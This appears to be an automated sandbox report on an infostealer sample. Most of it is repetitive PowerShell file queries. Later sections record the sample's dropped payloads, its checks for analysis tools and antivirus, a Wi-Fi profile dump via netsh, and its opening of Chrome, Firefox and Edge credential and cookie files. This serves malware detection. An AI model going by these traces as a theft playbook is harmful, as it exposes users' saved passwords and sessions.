                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D681C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,5_2_0C5D681C
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C5630 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,5_2_0C5C5630
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,11_2_00007FF7102E518C
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC433EC GetVersionExW,0_2_00007FF7CDC433EC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 34.2.rundll32.exe.6f6f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.759D.tmp.gfx.exe.4b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.rundll32.exe.6f6f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.0.759D.tmp.gfx.exe.4b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.0.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.Gxtuum.exe.300000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dll, type: DROPPED
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 17.0.6148.tmp.ssg.exe.7b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 6148.tmp.ssg.exe PID: 4040, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe, type: DROPPED
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\c6rta27r.default\logins.json
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
